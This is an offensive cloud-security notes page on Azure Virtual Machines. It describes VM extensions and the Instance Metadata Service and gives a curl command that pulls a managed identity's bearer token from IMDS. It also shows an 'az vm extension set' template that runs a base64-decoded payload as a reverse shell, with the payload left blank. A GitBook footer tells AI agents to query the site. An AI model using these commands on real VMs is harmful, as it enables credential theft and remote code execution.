> For the complete documentation index, see [llms.txt](https://www.techwithtyler.dev/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.techwithtyler.dev/cloud-security/azure/azure-services-info/compute/azure-virtual-machines.md). # Azure Virtual Machines ## Overview * Provides on-demand virtual compute resources *** ## Capabilities ### Extensions * Extensions are small applications that provide post-deployment configuration and automation on Azure virtual machines (VMs) both on Windows and Linux such as executing code, installers, and more * Requires the [Azure Windows VM Agent](https://learn.microsoft.com/en-us/azure/virtual-machines/extensions/agent-windows) or [Azure Linux VM Agent](https://learn.microsoft.com/en-us/azure/virtual-machines/extensions/agent-linux) * Extensions may be region dependent *** ### Instance Metadata Service (IMDS) * Exposes several [categories of information](https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#endpoint-categories) such as instance details (OS info, networking, etc.), scheduled events (VM maintenance jobs), Load Balancer info, tokens for Managed Identities (if assigned), and more * Available at the following URL: `http://169.254.169.254/metadata/` #### Retrieving Access Token * If a Managed Identity is assigned to the instance, we can retrieve its bearer token * Other examples such as using GO, Python, etc. are [found here](https://learn.microsoft.com/en-us/entra/identity/managed-identities-azure-resources/how-to-use-vm-token#overview) {% code overflow="wrap" %} ```zsh HEADER="Metadata:true" URL="http://169.254.169.254/metadata" API_VERSION="2021-12-13" curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://vault.azure.net/" ``` {% endcode %} *** ## Security Configuration * *** ## Commands & Examples ### Execute Arbitrary Code #### Reverse Shell {% tabs %} {% tab title="Linux" %} {% code overflow="wrap" %} ```zsh az vm extension set \ --resource-group \ --vm-name \ --name CustomScript \ --publisher Microsoft.Azure.Extensions \ --version 2.1 \ --settings '{}' \ --protected-settings '{"commandToExecute": "nohup echo | base64 -d | bash &"}' ``` {% endcode %} {% endtab %} {% tab title="Windows" %} {% endtab %} {% endtabs %} *** ## CLI Cheat Sheet {% embed url="" %} *** ## Offensive Security Tactics & Techniques * links to examples *** ## Additional Resources {% embed url="" %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://www.techwithtyler.dev/cloud-security/azure/azure-services-info/compute/azure-virtual-machines.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.